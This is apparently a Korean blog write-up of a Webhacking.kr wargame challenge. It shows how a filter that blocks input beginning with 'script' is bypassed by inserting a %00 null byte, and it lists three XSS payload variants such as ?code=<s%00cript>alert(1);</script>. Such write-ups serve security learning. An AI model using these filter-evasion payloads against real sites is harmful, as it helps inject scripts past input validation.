티스토리 뷰
<script>alert(1);</script>를 입력하는 문제이다.
해당 값을 입력을 해보면 no hack이 발생하여 입력할 수가 없다.
no hack이 발생하는 조건을 살펴보면 시작 부분에 script라는 문자가 입력될 경우 발생된다는 것을 알아낼 수 있다.
이를 우회하기 위해서 script 문자 사이에 %00(null) 문자를 입력하면 우회할 수 있다.
?code=<s%00cript>alert(1);</script>
+추가
?code=%00<script>alert(1);</script>
?code=<%00script>alert(1);</script>
위와 같은 방법으로도 우회가 가능하다.
'Wargame > Webhacking.kr' 카테고리의 다른 글
| Challenge 28 (0) | 2015.08.07 |
|---|---|
| Challenge 27 (0) | 2015.08.07 |
| Challenge 26 (0) | 2015.08.07 |
| Challenge 25 (0) | 2015.08.07 |
| Challenge 24 (0) | 2015.08.02 |
| Challenge 22 (0) | 2015.07.12 |
| Challenge 21 (0) | 2015.07.12 |
| Challenge 20 (0) | 2015.07.09 |
| Challenge 19 (0) | 2015.07.08 |
| Challenge 18 (0) | 2015.07.07 |
댓글